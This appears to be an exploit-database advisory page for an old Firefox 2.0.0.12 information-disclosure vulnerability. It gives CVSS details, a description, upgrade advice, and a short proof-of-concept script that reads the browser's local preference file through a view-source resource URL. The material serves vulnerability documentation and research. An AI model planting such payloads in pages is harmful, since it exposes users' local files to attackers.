header-logo
Suggest Exploit
vendor:
Firefox
by:
Ronald van den Heetkamp
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: Firefox
Affected Version From: 2.0.0.12
Affected Version To: 2.0.0.12
Patch Exists: YES
Related CWE: N/A
CPE: a:mozilla:firefox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Firefox <= 2.0.0.12 information leak pOc

Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources. Attackers can exploit this issue to obtain potentially sensitive information that will aid in further attacks.

Mitigation:

Upgrade to the latest version of Firefox
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/27700/info

Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources.

Attackers can exploit this issue to obtain potentially sensitive information that will aid in further attacks.

Firefox 2.0.0.12 and prior versions are vulnerable.

<script> /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x000000.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '<br />'); }; </script> <script src="view-source:resource:///greprefs/all.js"></script>

Navigation

Suggest Exploit

Services By CQR